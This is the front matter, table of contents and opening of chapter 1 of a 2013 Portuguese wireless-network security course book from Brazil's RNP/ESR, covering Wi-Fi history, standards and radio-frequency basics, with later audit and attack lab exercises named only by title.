Você está na página 1de 204

Ronaldo Vasconcellos é formado em A RNP – Rede Nacional de Ensino

Análise de Sistemas (PUC Campinas),


com especialização em redes (IC Uni-
e Pesquisa – é qualificada como
camp) e certificações GIAC Certified uma Organização Social (OS),
Incident Handler (GCIH) e GIAC Asses-
sing and Auditing Wireless Networks sendo ligada ao Ministério da
(GAWN). Trabalha com segurança Ciência, Tecnologia e Inovação
computacional desde 2002 (seis anos na área de Resposta
a Incidentes Computacionais), e desde 2010 na área de (MCTI) e responsável pelo
pesquisa em Ameaças Cibernéticas e Cibercrime, com foco Programa Interministerial RNP,
no Brasil e Ibero-América.
que conta com a participação dos
O curso tem por objetivo capacitar o participante para
ministérios da Educação (MEC), da

Segurança em
a realização da segurança do ambiente wireless da sua
Saúde (MS) e da Cultura (MinC).
organização. Serão ensinados os fundamentos de ra-

LIVRO DE APOIO AO CURSO


Pioneira no acesso à Internet no
diofrequência e identificados os principais protocolos e
Brasil, a RNP planeja e mantém a

Redes

Segurança em Redes sem Fio


normas envolvidas na comunicação Wi-Fi. Com ênfase
rede Ipê, a rede óptica nacional
em redes IEEE 802.11a/b/g/n, serão apresentados os
acadêmica de alto desempenho.
riscos que ameaçam este tipo de rede, e técnicas para
Com Pontos de Presença nas

sem Fio
mitigá-los com uso de ferramentas baseadas em Linux
27 unidades da federação, a rede
e Windows. Serão desenvolvidas as competências para
tem mais de 800 instituições
a estruturação de uma rede sem fio de forma segura e
conectadas. São aproximadamente
atendendo a todos os requisitos necessários para impe-
3,5 milhões de usuários usufruindo
dir os principais ataques. O aluno será ainda familiari-
de uma infraestrutura de redes
zado com ferramentas livres para verificação da rede e
avançadas para comunicação,
realização de auditorias de segurança.
computação e experimentação,
Este livro inclui os roteiros das atividades práticas e o
que contribui para a integração
conteúdo dos slides apresentados em sala de aula,
apoiando profissionais na disseminação deste conheci- Ronaldo Vasconcellos entre o sistema de Ciência e
Tecnologia, Educação Superior,
mento em suas organizações ou localidades de origem.
Saúde e Cultura.

Ministério da
Cultura

Ministério da
Saúde

Ministério da
Educação
ISBN 978–85–63630–30–8
Ministério da
Ciência, Tecnologia
e Inovação

9 788563 630308
A RNP – Rede Nacional de Ensino
e Pesquisa – é qualificada como
uma Organização Social (OS),
sendo ligada ao Ministério da
Ciência, Tecnologia e Inovação
(MCTI) e responsável pelo
Programa Interministerial RNP,
que conta com a participação dos
ministérios da Educação (MEC), da
Saúde (MS) e da Cultura (MinC).
Pioneira no acesso à Internet no
Brasil, a RNP planeja e mantém a
rede Ipê, a rede óptica nacional
acadêmica de alto desempenho.
Com Pontos de Presença nas
27 unidades da federação, a rede
tem mais de 800 instituições
conectadas. São aproximadamente
3,5 milhões de usuários usufruindo
de uma infraestrutura de redes
avançadas para comunicação,
computação e experimentação,
que contribui para a integração
entre o sistema de Ciência e
Tecnologia, Educação Superior,
Saúde e Cultura.

Ministério da
Cultura

Ministério da
Saúde

Ministério da
Educação

Ministério da
Ciência, Tecnologia
e Inovação
Segurança em
Redes
sem Fio

Ronaldo Vasconcellos
Segurança em
Redes
sem Fio

Ronaldo Vasconcellos

Rio de Janeiro
Escola Superior de Redes
2013
Copyright © 2013 – Rede Nacional de Ensino e Pesquisa – RNP
Rua Lauro Müller, 116 sala 1103
22290-906 Rio de Janeiro, RJ

Diretor Geral
Nelson Simões

Diretor de Serviços e Soluções


José Luiz Ribeiro Filho

Escola Superior de Redes


Coordenação
Luiz Coelho

Edição
Pedro Sangirardi

Revisão
Lincoln da Mata

Revisão Técnica
Frederico Costa

Coordenação Acadêmica de Segurança e Governança de TI


Edson Kowask

Equipe ESR (em ordem alfabética)


Celia Maciel, Cristiane Oliveira, Derlinéa Miranda, Elimária Barbosa, Evellyn Feitosa,
Felipe Nascimento, Lourdes Soncin, Luciana Batista, Luiz Carlos Lobato, Renato Duarte,
Sergio Ricardo de Souza e Yve Abel Marcial.

Capa, projeto visual e diagramação


Tecnodesign

Versão
1.3.0

Este material didático foi elaborado com fins educacionais. Solicitamos que qualquer erro encon-
trado ou dúvida com relação ao material ou seu uso seja enviado para a equipe de elaboração de
conteúdo da Escola Superior de Redes, no e-mail info@esr.rnp.br. A Rede Nacional de Ensino e
Pesquisa e os autores não assumem qualquer responsabilidade por eventuais danos ou perdas,
a pessoas ou bens, originados do uso deste material.
As marcas registradas mencionadas neste material pertencem aos respectivos titulares.

Distribuição
Escola Superior de Redes
Rua Lauro Müller, 116 – sala 1103
22290-906 Rio de Janeiro, RJ
http://esr.rnp.br
info@esr.rnp.br

Dados Internacionais de Catalogação na Publicação (CIP)

V331t Vasconcellos, Ronaldo.


Segurança em Redes sem Fio / Ronaldo Vasconcellos. – Rio de Janeiro: RNP/ESR, 2013.

200 p. : il. ; 28 cm.

Bibliografia: p. 181-182.
ISBN 978-85-63630-30-8

1. Fundamentos da radiofrequência. 2. Redes sem fio. 3. Comutação por pacotes


(Transmissão de dados). 4. Seleção de padrões. I. Título

CDD 004.65
Sumário

Escola Superior de Redes

A metodologia da ESR xiii

Sobre o curso  xiv

A quem se destina xiv

Convenções utilizadas neste livro xiv

Permissões de uso xv

Sobre os autores xvi

1. História, padrões e fundamentos de radiofrequência


Introdução  1

Exercício de nivelamento 1 – História, padrões e fundamentos de radiofrequência 1

Classificação de redes por área de cobertura 2

WLAN 3

Regulamentação 3

Papel da WLAN 3

Os sete principais papéis da WLAN 4

Fundamentos de radiofrequência 4

Ganho e perda de sinal 5

Causas de perda 6

Reflexão 6

Espalhamento 6

Difração 7

Refração 7

LOS 8

VSWR 9
iii
Antenas – Ganho 9

Potência de radiação 10

Equivalent Isotropically Radiated Power (EIRP) 10

Matemática RF 11

Exercício de fixação 1 – Fundamentos de radiofrequência 11

Tecnologias de transmissão 12

Implementações de Spread Spectrum 12

Direct Sequence Spread Spectrum (DSSS) 13

Orthogonal Frequency Division Multiplexing (OFDM) 14

Exercício de fixação 2 – Tecnologias de transmissão 16

Organizações e padrões 16

Padrões Wi-Fi Alliance  16

WPA  16

WPA2 17

Padrões IETF 18

Padrões IEEE 18

Padrões IEEE 802.11  19

Padrões 802.11 inexistentes  20

Tendências 20

Wi-Fi e telefonia IP 20

Wi-Fi a bordo 21

Padrão 802.11n 21

Roteiro de Atividades 1 23

Atividade 1.1 – Matemática RF 23

Atividade 1.2 – Órgãos reguladores 23

Atividade 1.3 – IEEE 802.11n 23

Atividade 1.4 – WPA2 e RSN 24

Atividade 1.5 – Projeto de WLAN com intersecção de células 24

2. WLAN: equipamentos
e configuração

Introdução 25

Exercício de nivelamento 1 – WLAN 25

Acess Point 26

iv
Clientes WLAN 26

Conceitos sobre antenas 27

Antena Omnidirecional (dipolo) 28

Antena Semidirecional 28

Antena altamente direcional 29

Amplificadores  29

Atenuadores 29

Splitter 29

Conectores 30

Cabos 30

Exercício de fixação 1 – WLAN: equipamentos e acessórios 30

Configuração de clientes 31

Windows 31

Linux 32

Roteiro de Atividades 2 35

Atividade 2.1 – Configuração de um cliente Windows 35

Atividade 2.2 – Configuração de um cliente Linux 39

3. Auditoria em redes sem fio (parte 1)


Introdução 49

Ataques a redes sem fio 49

Concepções erradas 49

Segurança física 51

Wardriving 51

Piggybacking 52

Warflying 52

DEFCON Wifi Shootout Contest 53

Divulgação de informações 53

Negação de serviço 53

Access points rogue 54

Outros ataques 54

Tráfego 802.11 55

Arquitetura IBSS 55

802.1x 56

IEEE 802.11 57

Quadros 802.11  59

v
Captura 59

Modos de operação das interfaces de rede 60

Roteiro de Atividades 3 61

Atividade 3.1 – Captura e análise de tráfego em sistemas Windows 61

Atividade 3.2 – Captura e análise de tráfego em sistemas Linux 62

Atividade 3.3 – Vazamento de informações em redes Wi-Fi  65

4. Auditoria em redes sem fio (parte 2)


Introdução 67

Exercício de nivelamento 1 – Ataques a redes sem fio 67

Metodologias de auditoria 67

Fingerprinting do AP 69

Fingerprinting passivo  69

Fingerprinting ativo 69

Processamento de informações coletadas 69

Identificação de métodos de segurança  70

Mapeamento externo 70

Mapeamento interno 71

Avaliação do tráfego 72

Avaliação de tráfego cifrado 72

Análise da camada MAC 73

Avaliação de tráfego cifrado 73

Exercício de fixação 1 – Metodologias de auditoria 73

Ferramentas de auditoria 73

Wireshark 74

Kismet 75

NetStumbler 76

GPSMAP 77

Roteiro de Atividades 4 79

Atividade 4.1 – NetStumbler no Windows e suas funcionalidades 79

Atividade 4.2 – Kismet no Linux e suas funcionalidades 79

Atividade 4.3 – Demonstração de injeção de tráfego na rede 82

vi
5. Redes rogue e ataques DoS
Introdução 85

Exercício de nivelamento 1 – Redes rogue  85

Problemas agravantes 86

Tipos de rogue 86

Técnicas de identificação de rogues 86

Rede cabeada: Fingerprinting do AP 87

Rede cabeada: análise do prefixo MAC 87

Warwalking 88

Monitoração da rede por clientes 89

Rede sem fio: IDS na WLAN 90

Intrusion Prevention System (IPS) 91

Localizando rogues por análise de SNR 91

Etapas da localização por SNR 92

Criando um AP rogue sob Linux 93

Exercício de fixação 1 – Redes rogue 93

Denial of Service (DoS) 94

Tipos de ataque DoS contra redes 802.11 94

Ataque contra a camada física 94

Ataques à camada MAC 802.11 95

Ataque persistente: flood de autenticação ou associação 95

Ataque não persistente: flood de desautenticação 97

Ataque não persistente: autenticação inválida 98

Ataque não persistente: reserva do meio 98

Ataque não persistente: problemas de CSMA/CA 99

DoS e IEEE 802.11 99

Medidas de defesa 100

Roteiro de Atividades 5 101

Atividade 5.1 – Identificando APs na rede cabeada 101

Atividade 5.2 – Realizando um ataque de Negação de Serviço em 802.11 102

Atividade 5.3 – Exercício opcional 104

Atividade 5.4 – Um ataque rogue completo 104

vii
6. Redes WEP-PSK
Introdução 107

Wired Equivalent Privacy (WEP) 107

Chaves WEP 108

WEP no quadro 802.11 108

Processo de cifragem WEP 109

Problemas de WEP 111

Sem proteção contra replay 111

Verificação fraca de integridade 111

Sem mecanismo de rotação de chaves 112

Vetor de inicialização muito curto 113

Fase de desafio-resposta revela o PRGA 113

Ataques contra WEP 114

Ataque de dicionário 114

Algoritmo de geração de chaves Neesus Datacom  115

Auditando redes com WEP 116

Etapas da auditoria 117

Melhorando a segurança de redes WEP 117

Migrar para um método de segurança mais forte 118

Roteiro de Atividades 6 119

Atividade 6.1 – Capturando pacotes cifrados com WEP com ferramentas Aircrack-ng 119

Atividade 6.2 – Recuperando uma chave WEP utilizando o Aircrack-ng 121

Atividade 6.3 – Decifrando tráfego WEP  123

7. Redes WPA-PSK
Introdução 125

WPA 126

TKIP – MIC 126

WEP 127

Michael 127

TKIP – sequência do IV 128

Ataques de replay: como TKIP resolveu o problema 128

Rekeying  128

Rekeying – a solução de WPA 129

viii
Key Mixing  129

Key Mixing – solução de WPA  130

TKIP – 4-Way Handshake 130

Identificando redes WPA-PSK 134

Filtro de Wireshark  134

Ataques contra WPA-PSK 135

Melhorando a segurança de WPA-PSK 135

Vulnerabilidades do TKIP 136

WPA2 136

Roteiro de Atividades 7 137

Atividade 7.1 – Descobrindo a chave WPA-PSK por ataque de dicionário 137

Atividade 7.2 – Descobrindo a chave WPA-PSK por ataque de dicionário de


maneira muito mais rápida 138

Atividade 7.3 – Realizando um ataque contra a rede do laboratório 139

8. Sistemas de detecção de intrusões (IDS) em redes WLAN


Introdução 141

Sistemas de detecção de intrusos (IDS) em redes WLAN  141

Termos importantes  142

Modelos de implantação 143

Cobertura 143

Implantação integrada  144

Métodos de detecção 144

Análise de assinaturas  145

Análise de tendências 145

Análise de anomalias  145

Avaliando soluções de IDS 146

Características importantes 147

IDS distribuído com Kismet 147

Drones Kismet  148

Alertas e detecção de intrusões 148

Tipos de alerta – assinatura (12 tipos) 149

Tipos de alerta – tendências (10 tipos)  150

Prática de Kismet como IDS Distribuído 151

ix
Roteiro de Atividades 8 153

Atividade 8.1 – Configurando o Kismet Drone 154

Atividade 8.2 – Configurando o Kismet Server 154

Atividade 8.3 – Cobrindo todos os canais 155

Atividade 8.4 – Alertas 156

9. Implantando uma WLAN segura (parte 1)


Introdução 157

Segurança padrão no AP 157

Segurança sem fio 158

Configurações de segurança 159

Atualização de firmware 160

AP mais seguro com OpenWRT 161

OpenWRT  162

Vantagens do OpenWRT 162

Instalação passo a passo 163

Instalação do firmware pela interface administrativa web 165

Roteiro de Atividades 9 167

Atividade 9.1 – Configurações gerais de desempenho e segurança 167

Atividade 9.2 – Configurando um AP com WPA ou WPA2 Personal 168

Atividade 9.3 – Configurações extras de segurança e desempenho 169

10. Implantando uma WLAN segura (parte 2)


Introdução 171

Nível atual de segurança 171

Arquitetura de autenticação 172

802.1x e FreeRADIUS 173

Por que EAP-TLS? 174

Desvantagens de EAP-TLS 174

Conclusão 175

Cenário atual 176

x
Roteiro de Atividades 10 177

Atividade 10.1 – Autenticação RADIUS 177

Atividade 10.2 – Configuração do AP com WPA2 Enterprise 177

Atividade 10.3 – Testando a autenticação 178

Atividade 10.4 – Arquivos de configuração do RADIUS 178

Bibliografia  181

xi
xii
Escola Superior de Redes
A Escola Superior de Redes (ESR) é a unidade da Rede Nacional de Ensino e Pesquisa (RNP)
responsável pela disseminação do conhecimento em Tecnologias da Informação e Comunica-
ção (TIC). A ESR nasce com a proposta de ser a formadora e disseminadora de competências
em TIC para o corpo técnico-administrativo das universidades federais, escolas técnicas e
unidades federais de pesquisa. Sua missão fundamental é realizar a capacitação técnica do
corpo funcional das organizações usuárias da RNP, para o exercício de competências aplicá-
veis ao uso eficaz e eficiente das TIC.

A ESR oferece dezenas de cursos distribuídos nas áreas temáticas: Administração e Projeto
de Redes, Administração de Sistemas, Segurança, Mídias de Suporte à Colaboração Digital e
Governança de TI.

A ESR também participa de diversos projetos de interesse público, como a elaboração e


execução de planos de capacitação para formação de multiplicadores para projetos edu-
cacionais como: formação no uso da conferência web para a Universidade Aberta do Brasil
(UAB), formação do suporte técnico de laboratórios do Proinfo e criação de um conjunto de
cartilhas sobre redes sem fio para o programa Um Computador por Aluno (UCA).

A metodologia da ESR
A filosofia pedagógica e a metodologia que orientam os cursos da ESR são baseadas na
aprendizagem como construção do conhecimento por meio da resolução de problemas típi-
cos da realidade do profissional em formação. Os resultados obtidos nos cursos de natureza
teórico-prática são otimizados, pois o instrutor, auxiliado pelo material didático, atua não
apenas como expositor de conceitos e informações, mas principalmente como orientador do
aluno na execução de atividades contextualizadas nas situações do cotidiano profissional.

A aprendizagem é entendida como a resposta do aluno ao desafio de situações-problema


semelhantes às encontradas na prática profissional, que são superadas por meio de análise,
síntese, julgamento, pensamento crítico e construção de hipóteses para a resolução do pro-
blema, em abordagem orientada ao desenvolvimento de competências.

Dessa forma, o instrutor tem participação ativa e dialógica como orientador do aluno para as
atividades em laboratório. Até mesmo a apresentação da teoria no início da sessão de apren-
dizagem não é considerada uma simples exposição de conceitos e informações. O instrutor
busca incentivar a participação dos alunos continuamente.

xiii
As sessões de aprendizagem onde se dão a apresentação dos conteúdos e a realização das
atividades práticas têm formato presencial e essencialmente prático, utilizando técnicas de
estudo dirigido individual, trabalho em equipe e práticas orientadas para o contexto de atua-
ção do futuro especialista que se pretende formar.

As sessões de aprendizagem desenvolvem-se em três etapas, com predominância de tempo


para as atividades práticas, conforme descrição a seguir:

Primeira etapa: apresentação da teoria e esclarecimento de dúvidas (de 60 a 90 minutos).


O instrutor apresenta, de maneira sintética, os conceitos teóricos correspondentes ao tema
da sessão de aprendizagem, com auxílio de slides em formato PowerPoint. O instrutor levanta
questões sobre o conteúdo dos slides em vez de apenas apresentá-los, convidando a turma
à reflexão e participação. Isso evita que as apresentações sejam monótonas e que o aluno se
coloque em posição de passividade, o que reduziria a aprendizagem.

Segunda etapa: atividades práticas de aprendizagem (de 120 a 150 minutos).


Esta etapa é a essência dos cursos da ESR. A maioria das atividades dos cursos é assíncrona e
realizada em duplas de alunos, que acompanham o ritmo do roteiro de atividades proposto no
livro de apoio. Instrutor e monitor circulam entre as duplas para solucionar dúvidas e oferecer
explicações complementares.

Terceira etapa: discussão das atividades realizadas (30 minutos).


O instrutor comenta cada atividade, apresentando uma das soluções possíveis para resolvê-la,
devendo ater-se àquelas que geram maior dificuldade e polêmica. Os alunos são convidados a
comentar as soluções encontradas e o instrutor retoma tópicos que tenham gerado dúvidas,
estimulando a participação dos alunos. O instrutor sempre estimula os alunos a encontrarem
soluções alternativas às sugeridas por ele e pelos colegas e, caso existam, a comentá-las.

Sobre o curso
O curso tem por objetivo capacitar o participante para a realização da segurança do
ambiente wireless da sua organização. Serão ensinados os fundamentos de radiofrequência
e identificados os principais protocolos e normas envolvidas na comunicação Wi-Fi. Com
ênfase em redes Wi-Fi (IEEE 802.11a/b/g/n), serão apresentados os riscos que ameaçam
este tipo de rede, e técnicas para mitigá-los com uso de ferramentas baseadas em Linux e
Windows. Serão desenvolvidas as competências para a estruturação de uma rede sem fio
de forma segura e atendendo a todos os requisitos necessários para impedir os principais
ataques. O aluno será ainda familiarizado com ferramentas livres para verificação da rede
e realização de auditorias de segurança.

A quem se destina
O curso é destinado aos profissionais de segurança, auditores e administradores de rede.
Profissionais de outras áreas podem participar, desde que tenham realizado o curso
Tecnologias de Redes sem Fio, oferecido pela ESR, ou possuam conhecimento equivalente.

Convenções utilizadas neste livro


As seguintes convenções tipográficas são usadas neste livro:

Itálico
Indica nomes de arquivos e referências bibliográficas relacionadas ao longo do texto.

xiv
Largura constante

Indica comandos e suas opções, variáveis e atributos, conteúdo de arquivos e resultado da saída
de comandos. Comandos que serão digitados pelo usuário são grifados em negrito e possuem
o prefixo do ambiente em uso (no Linux é normalmente # ou $, enquanto no Windows é C:\).

Conteúdo de slide
Indica o conteúdo dos slides referentes ao curso apresentados em sala de aula.

Símbolo
Indica referência complementar disponível em site ou página na internet.

Símbolo
Indica um documento como referência complementar.

Símbolo
Indica um vídeo como referência complementar.

Símbolo
Indica um arquivo de aúdio como referência complementar.

Símbolo
Indica um aviso ou precaução a ser considerada.

Símbolo
Indica questionamentos que estimulam a reflexão ou apresenta conteúdo de apoio ao
entendimento do tema em questão.

Símbolo
Indica notas e informações complementares como dicas, sugestões de leitura adicional ou
mesmo uma observação.

Permissões de uso
Todos os direitos reservados à RNP.
Agradecemos sempre citar esta fonte quando incluir parte deste livro em outra obra.
Exemplo de citação: TORRES, Pedro et al. Segurança em Redes sem Fio. Rio de Janeiro:
Escola Superior de Redes, RNP, 2013.

Comentários e perguntas
Para enviar comentários e perguntas sobre esta publicação:
Escola Superior de Redes RNP
Endereço: Av. Lauro Müller 116 sala 1103 – Botafogo
Rio de Janeiro – RJ – 22290-906
E-mail: info@esr.rnp.br

xv
Sobre os autores
Ronaldo Vasconcellos é formado em Análise de Sistemas (PUC Campinas), com especiali-
zação em redes (IC Unicamp) e certificações GIAC Certified Incident Handler (GCIH) e GIAC
Assessing and Auditing Wireless Networks (GAWN). Trabalha com segurança computacional
desde 2002 (seis anos na área de Resposta a Incidentes Computacionais), e desde 2010 na
área de pesquisa em Ameaças Cibernéticas e Cibercrime, com foco no Brasil e Ibero-América.

Frederico Costa atua há 15 anos na área de administração de redes e segurança da infor-


mação. Seu foco de atuação é segurança de infraestrutura e monitoramento de redes. Atu-
almente é coordenador de segurança no Centro de Atendimento a Incidentes de Segurança
da Rede Nacional de Ensino e Pesquisa (CAIS/RNP). Possui certificação GPEN e já ministrou
cursos práticos (hands-on) focados em segurança da informação, no Brasil e no exterior.
Além disso, atualmente é membro de um grupo de trabalho da OEA para elaboração de
exercícios cibernéticos voltados a respostas a incidentes de segurança, e também lidera
uma iniciativa para o estabelecimento de infraestrutura de monitoramento para as redes
acadêmicas da América Latina, no âmbito das ações do GT-CSIRT/RedCLARA.

Edson Kowask Bezerra é profissional da área de segurança da informação e governança


há mais de quinze anos, atuando como auditor líder, pesquisador, gerente de projeto e
gerente técnico, em inúmeros projetos de gestão de riscos, gestão de segurança da infor-
mação, continuidade de negócios, PCI, auditoria e recuperação de desastres em empresas
de grande porte do setor de telecomunicações, financeiro, energia, indústria e governo.
Com vasta experiência nos temas de segurança e governança, tem atuado também como
palestrante nos principais eventos do Brasil e ainda como instrutor de treinamentos focados
em segurança e governança. É professor e coordenador de cursos de pós-graduação na área
de segurança da informação, gestão integrada, de inovação e tecnologias web. Hoje atua como
Coordenador Acadêmico de Segurança e Governança de TI da Escola Superior de Redes.

xvi
1
História, padrões e fundamentos
de radiofrequência
Apresentar breve histórico das redes sem fio (ou Wi-Fi); mostrar as organizações
objetivos

envolvidas na padronização de redes sem fio e as principais normas adotadas;


descrever as tecnologias de transmissão e fundamentos de radiofrequência relevantes
para o auditor de redes sem fio.

conceitos
Os fundamentos de radiofrequência, Matemática RF, organizações e hotplug.

Introdução
11 WLAN: redes locais sem fio. q
11 Fundamentos de radiofrequência.

11 Tecnologias de transmissão.

11 Organizações e padrões.

11 Tendências.

Exercício de nivelamento 1 e

Capítulo 1 - História, padrões e fundamentos de radiofrequência


História, padrões e fundamentos de radiofrequência
O que é rede sem fio?

O Capítulo 1 tem teor introdutório, apresentando breve histórico das redes sem fio, fun-
damentos de radiofrequência, tecnologias de transmissão (FHSS, DSSS, OFDM e MIMO) e
organizações envolvidas na padronização e regulamentação de redes sem fio no mundo.

Ao final do capítulo, é traçado um panorama do mercado de redes sem fio com foco em
redes WLAN e WMAN, e apresentadas tendências e tecnologias emergentes.

11 Comunicação entre dispositivos sem o uso de cabos. q


11 Engloba desde sistemas simples, tais como microfones sem fio, até redes locais
sem fio (WLAN).

1
11 Recebem e transmitem informações usando ondas eletromagnéticas (EM). q
11 Comprimentos de onda que vão de 9 kilohertz (kHz) a centenas de Gigahertz (GHz).

Redes sem fio estão por toda a parte. Embora redes de computadores sem fio sejam um
tópico recente, outros tipos de rede sem fio estão presentes em nossas vidas há muito
tempo: microfones sem fio, rádio AM e FM, celulares GSM, infravermelho, entre outros.

Frequências de transmissão de algumas dessas redes:

11 Very Low Frequency (VLF): 9-30 kHz;

11 Low Frequency (LF): 30-300 kHz;

11 Medium Frequency (MF): 300 kHz-3 MHz: estações de rádio AM (535 kHz-1 MHz);

11 High Frequency (HF): 3 MHz-30 MHz;

11 Very High Frequency (VHF): 30 MHz-300 MHz: estações de rádio FM, telefones sem fio
e controle remoto de garagem;

11 Ultra High Frequency (UHF): 300 MHz-3 GHz, WLAN (2.4 GHz), Bluetooth, sistemas de
pager, celulares 1G, 2G e 3G, Global System for Mobile Communication (GSM), Enhanced
Data Rates for Global Evolution (EDGE);

11 Super High Frequency (SHF): WLAN (5.8 GHz);

11 Extremely High Frequency (EHF): 30 GHz-300 GHz; comunicação de satélites;

11 Infrared (IR): comunicação por infravermelho entre periféricos.

Apesar de muitas e diversas, são normalmente classificadas por sua área de cobertura: q
11 WWAN: 3G, EV-DO/EV-DV.

11 WMAN: WiMAX, baseado no padrão IEEE 802.16.

11 WLAN: baseado em IEEE 802.11, produtos certificados como Wi-Fi.

11 WPAN: bluetooth (IEEE 802.15.1) e IR (Infrared).

Foco deste curso: WLAN, padrões IEEE 802.11 e padrões associados (IEEE 802.1X).

Classificação de redes por área de cobertura


Redes sem fio são classificadas por sua área de abrangência, tal como as redes cabeadas.
Redes locais, denominadas Local Area Network (LAN), passam a ser chamadas de Wireless
Local Area Network (WLAN). WLAN e padrões associados são o foco deste curso.

11 Wireless Wide Area Network (WWAN): atualmente representada por tecnologias como
3G, 802.20 (MBWA – Mobile Broadband Wireless Access) e EV-DO/EV-DV.

11 Wireless Metropolitan Area Network (WMAN): atualmente todas as atenções estão


voltadas para o padrão IEEE 802.16, impulsionado pelo WiMAX Forum. A denominação
WiMAX, acrônimo para Worldwide Interoperability for Microwave Access, indica que o
Segurança em Redes sem Fio

produto foi certificado de maneira independente pelo WiMAX Forum, de maneira que
seja garantida a interoperabilidade entre fornecedores. Essa classe de redes possui
alcances metropolitanos, com mobilidade (IEEE 802.16e), e complementa os padrões de
IEEE 802.11, com enfoque em redes locais.

11 Wireless Local Area Network (WLAN): veremos os padrões 802.11 mais adiante em
detalhes, uma vez que são o foco deste curso.

2
11 Wireless Personal Area Network (WPAN): o padrão Bluetooth (IEEE 802.11.1-2002
Bluetooth 1.1/802.11.1-2005 Bluetooth 1.2), hoje muito popular em celulares, foi criado
para interconectar celulares, PDAs (Personal Digital Assistants) e PCs de maneira fácil e
sem fio. Tem mostrado, com suas vulnerabilidades, o quanto a indústria não aprendeu
com os erros do início do desenvolvimento dos padrões de redes Wi-Fi.

WLAN
11 Rede local sem fio (Wireless Local Area Network – WLAN). q
11 Wi-Fi: certificação de interoperabilidade.

11 Mercado em constante expansão.

11 Presente em todo laptop.

11 Celulares, câmeras digitais, PDAs, televisores e consoles portáteis de videogame.

w Wi-Fi
Para mais informações Marca criada em 2000 com assessoria da Interbrand, empresa de consultoria de marcas que
sobre Wi-Fi Alliance, criou marcas conhecidas como Prozac, Imation (3M) e Compaq. A Wi-Fi Alliance certifica a
acesse:
http://www.wi-fi.org interoperabilidade entre equipamentos que não são padrões, como o Institute of Electrical
and Electronics Engineers (IEEE). De acordo com Phil Belanger, membro fundador da organi-
zação, “Wireless Fidelity” não significa nada. Foi apenas uma tentativa de juntar duas palavras,
Wi e Fi. Até 2002, o nome da aliança era Wireless Ethernet Compatibility Alliance (WECA).

Regulamentação
11 WLAN é regulamentada nos EUA pela Federal Communications Commission (FCC) e, q
no Brasil, pela Agência Nacional de Telecomunicações (Anatel).

11 Ainda restritas ao papel de ponto de entrada em uma rede cabeada: velocidade baixa
e resistência a falhas.

11 Atualmente custa menos do que uma rede cabeada.

Nos Estados Unidos, a frequência utilizada pelas WLAN (IEEE 802.11) é regulamentada pela
Federal Communications Commission (FCC).

Capítulo 1 - História, padrões e fundamentos de radiofrequência


No Brasil, a Anatel tem o papel regulador da FCC. As redes Wi-Fi não precisam de autori-
zação da Anatel para operar, mas devem estar de acordo com as condições de uso da Reso-
lução 506 (2008). Trataremos das potências de transmissão em um dos próximos tópicos.
A resolução 506 atualiza a resolução nº 365, de 10 de maio de 2004.

Papel da WLAN
Como veremos no decorrer do curso, um dos principais elementos de uma rede sem fio é o
Wireless Access Point (WAP), popularmente chamado de AP. Trata-se do elemento da rede
que tem o papel de ponto de entrada na rede cabeada, mas frequentemente oferece outras
funcionalidades, tais como controle de acesso, firewall, Network Address Translation (NAT),
entre outras.

É importante que, diante de tantos padrões de rede sem fio emergentes – WiMAX, EV-DO,
Bluetooth e outros – se entenda bem o papel das redes WLAN 802.11. WiMAX não foi
desenvolvido para substituir Wi-Fi, mas sim para complementar essa tecnologia.

3
Redes 802.11 continuarão a exercer seu papel na rede local (LAN), já tecnologias como w
WiMAX e EV-DO serão a solução mais adequada quando os requisitos tiverem ênfase Mais informações em:
maior em abrangência e mobilidade. US Frequency Allocation
Chart (http://www.ntia.
doc.gov/osmhome/
Os sete principais papéis da WLAN allochrt.pdf) e Anatel

q
– Resolução nº 506, de
11 Acesso. 1º de julho de 2008, que
republica o Regula-
11 Extensão da rede. mento sobre Equipa-
mentos de
11 Última milha.
Radiocomunicação de
11 Mobilidade. Radiação Restrita: http://
www.anatel.gov.br
11 Conectividade de prédio a prédio.

11 Small Office Home Office (SOHO).

11 Escritório móvel.

Existem diversos motivos que impulsionam uma organização a implantar uma WLAN, que
podem envolver desde custo até impossibilidade de instalação de cabos.

Alguns papéis típicos da WLAN numa organização:

11 Acesso: ponto de entrada na rede cabeada com ênfase em mobilidade;

11 Extensão da rede: extensão da rede cabeada sem a necessidade de instalação de cabos;

11 Última milha: infraestrutura de provimento de acesso ao usuário final, de um Internet


Service Provider (ISP) ao cliente. WiMAX tende a ocupar esse papel, uma vez que é uma
tecnologia mais apropriada para grandes áreas de abrangência;

11 Mobilidade: quando mobilidade é mais importante que velocidade e qualidade do


serviço, a WLAN pode ser uma tecnologia a ser considerada;

11 Conectividade prédio a prédio: uso de equipamentos voltados ao mercado SOHO, mas


com uso de antenas direcionais, por exemplo. É o caso da ligação entre duas LAN em
prédios próximos por meio de dois APs em modo bridge;

11 SOHO: para ambientes em que a velocidade do acesso não é requisito primordial, no


caso de poucos clientes de acesso. Pequenos escritórios, funcionários que trabalham em
regime de home office e usuários domésticos: o chamado mercado SOHO (Small Office/
Home Office) se encaixa nesse perfil. A maioria dos equipamentos 802.11 disponíveis em
lojas de eletrônicos se enquadram na categoria SOHO;

11 Escritório móvel: montagem de estandes em eventos, extensão da rede sem a necessi-


dade de gastar tempo e dinheiro com cabeamento.

Fundamentos de radiofrequência
11 Sinais de corrente alternada (AC) de alta frequência. q
11 Irradiados pelo ar na forma de ondas de rádio com o auxílio de antenas.
Segurança em Redes sem Fio

11 Ondas se propagam seguindo certos princípios de física, que abordaremos neste Capítulo.

11 Propagação das ondas depende do tipo de antena:

22 Omnidirecional.

22 Semidirecional.

22 Altamente direcional.

4
Sinais de rádio são irradiados pelo ar com a ajuda de antenas, componentes muito impor-
tantes no projeto de uma rede sem fio. Antenas inadequadas podem restringir o alcance do
sinal, da mesma forma que o uso de cabos e conectores inadequados podem atenuar o sinal
Alternate Current (AC) e prejudicar a transmissão e a recepção de dados.

Neste capítulo, serão abordados fundamentos de radiofrequência (RF) importantes para


planejamento e auditoria de redes sem fio. Conhecendo alguns conceitos básicos de física,
sobre propagação de ondas eletromagnéticas, o aluno será capaz de resolver problemas do
dia a dia de um administrador de redes sem fio, como por exemplo:

11 Problemas de conectividade;

11 Escolha de um melhor posicionamento do AP (site survey);

11 Localizar um AP rogue.

11 Propagação inconsistente. q
11 Interferências externas.

11 Comportamento:

22 Diferenças de impedância entre cabos e conectores provocam perda de sinal.

22 Ganho e perda de sinal.

22 Reflexão, refração, difração e espalhamento.

A radiofrequência (RF) é chamada de fumaça e espelhos (“smoke & mirrors”) por seu com-
portamento errático e inconsistente. Diversos fatores podem afetar o comportamento de
ondas de rádio, tais como:

